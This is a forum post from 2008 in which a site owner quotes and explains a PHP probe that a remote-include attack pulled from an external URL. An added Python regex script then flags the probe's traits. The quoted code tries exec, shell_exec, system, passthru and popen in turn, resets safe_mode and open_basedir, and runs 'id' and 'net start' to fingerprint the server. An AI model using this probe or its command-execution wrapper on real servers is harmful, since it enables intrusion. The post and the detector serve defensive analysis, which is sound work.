Original poster | Posted on 29-3-2008 03:06 AM
You also said it checks whether PHP SafeMode is on or off. Seems like an execute function or shell script.
WEB-MISC Phorecast remote code execution attempt
retrieve from : http://www.motoxclub.org.au/forum/test.txt
Changing this CMD will result in corrupt scanning !
<?php
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
  echo("Safe Mode of this Server is : "); echo("SafemodeOFF");
} else{
  ini_restore("safe_mode"); ini_restore("open_basedir");
  if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
    echo("Safe Mode of this Server is : "); echo("SafemodeOFF");
  }else{
    echo("Safe Mode of this Server is : "); echo("SafemodeON");
  }
}
function ex($cfe){
  $res = '';
  if (!empty($cfe)){
    if(function_exists('exec')){ @exec($cfe,$res); $res = join("\n",$res); }
    elseif(function_exists('shell_exec')){ $res = @shell_exec($cfe); }
    elseif(function_exists('system')){ @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); }
    elseif(function_exists('passthru')){ @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); }
    elseif(@is_resource($f = @popen($cfe,"r"))){ $res = ""; while(!@feof($f)) { $res .= @fread($f, 1024); } @pclose($f); }
  }
  return $res;
}
exit;
What in essence they are trying to do is use this remote 'command' to 'order' my site to divulge information.
These portions tell me that the attacker is attempting to do a 'net start' on my Windows box.
[ This post was last edited by Imnotsad on 30-3-2008 01:59 AM ]
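A triage check for files pulled in by a suspected remote include, keyed to the traits visible in the payload quoted above. This is an added example, not part of the original post; the trait names, the `triage` function and both samples are constructed for illustration.

```python
import re

# Traits taken from the payload quoted in the post above (names are illustrative).
TRAITS = {
    "exec_fallback_chain": re.compile(
        r"function_exists\(\s*['\"](exec|shell_exec|system|passthru)['\"]\s*\)"),
    "popen_fallback": re.compile(r"\bpopen\s*\("),
    "restriction_reset": re.compile(
        r"ini_restore\(\s*['\"](safe_mode|open_basedir)['\"]\s*\)"),
    "os_fingerprint_cmd": re.compile(r"\(\s*['\"](id|net\s+start)['\"]\s*\)"),
    "error_suppression": re.compile(r"@\w+\s*\("),
}

# Constructed samples: SAMPLE_PROBE reuses tokens from the quoted payload
# (line-wrapped on purpose), SAMPLE_BENIGN is an ordinary template fragment.
SAMPLE_PROBE = '''<?php if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net
start")))){ echo("SafemodeOFF"); } else{ ini_restore("safe_mode"); }
function ex($cfe){ if(function_exists('exec')){ @exec($cfe,$res); }
elseif(function_exists('shell_exec')){ $res = @shell_exec($cfe); } }'''
SAMPLE_BENIGN = '<?php echo htmlspecialchars($title); ?>'

def triage(text):
    """Return (verdict, hits) for a file fetched by a suspected remote include."""
    # Collapse whitespace so line-wrapped copies (as in the post) still match.
    flat = re.sub(r"\s+", " ", text)
    hits = {}
    for name, rx in TRAITS.items():
        found = rx.findall(flat)
        if found:
            hits[name] = len(found)
    # Distinct execution wrappers the file checks for, e.g. exec and shell_exec.
    wrappers = set(TRAITS["exec_fallback_chain"].findall(flat))
    strong = len(wrappers) >= 2 and "os_fingerprint_cmd" in hits
    if strong and "restriction_reset" in hits:
        verdict = "safe-mode probe"
    elif strong:
        verdict = "command-execution probe"
    elif hits:
        verdict = "review"
    else:
        verdict = "no match"
    return verdict, hits
```
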